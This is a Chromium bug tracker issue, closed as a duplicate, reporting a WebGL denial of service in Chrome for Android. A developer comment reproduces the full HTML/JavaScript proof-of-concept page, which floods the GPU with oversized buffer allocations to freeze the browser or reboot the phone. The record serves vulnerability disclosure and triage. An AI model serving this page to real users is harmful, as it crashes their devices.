New issue
Advanced search Search tips

Issue 653888 link

Starred by 0 users
Status: Duplicate
Owner: ----
Closed: Oct 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Gpu crash Denial of service or any other impact on the system

Reported by larawe...@gmail.com, Oct 7 2016 
Denial of service system Malitious user with the aid of a special form a web page can cause the device to hang or reboot.

1.Go to http://unix.testvt.testforhost.com/sec/test_gpu.html

Browser/OS Google Chrome	53.0.2785.124 	Android 4.4.2; ZTE T221 Build/KOT49H

Test 1
browser drop and long freeze
Test 2
browser drop 
Test 3
phone reboot 
Test 4
phone reboot 
Test 5
browser drop , long freeze reboot launcher.

About this bug was reported earlier in the desktop version of Chrome browser
In Chrome for Android browser behavior has changed. On phones with weak graphics processor may a longer hang or restart.

Comment 1 by tsepez@chromium.org, Oct 7 2016 

fetched the following from http://unix.testvt.testforhost.com/sec/test_gpu.html (for posterity):

<html>
<body>
<canvas id=c></canvas>
<script>
ctx = c.getContext("webgl");


function crash(){
	vertices = [];
 	counter = 0;
 	while (counter < 1000) {
     		vertices[counter] = 5;
     		counter++;
 	}

	for (i=0; i< 200; i++){
		buffer = ctx.createBuffer();
		ctx.bindBuffer(ctx.ARRAY_BUFFER, buffer);
		ctx.bufferData(ctx.ARRAY_BUFFER, 233287450,ctx.STATIC_DRAW);
		ctx.bufferSubData(ctx.ARRAY_BUFFER, 233287450, new Float32Array(vertices))
	}
	
}

c.addEventListener("webglcontextlost", function(){
	c.removeEventListener("webglcontextlost");
	setTimeout(function(){
		ctx = null;
		document.open();
		document.close();
		window.gc();
	},1000);

	setTimeout(function(){
		document.location = "http://www.google.com";
	},2000);
});

ctx.texImage2D(ctx.TEXTURE_2D,333,ctx.RGBA4,ctx.RGBA4,ctx.UNSIGNED_BYTE,c);
crash();
</script>
</body>
</html>
Project Member

Comment 2 by ClusterFuzz, Oct 7 2016 

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5625079105060864

Comment 3 by tsepez@chromium.org, Oct 10 2016

Mergedinto: 653372
Status: Duplicate (was: Unconfirmed)
Project Member

Comment 4 by sheriffbot@chromium.org, Jan 17 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment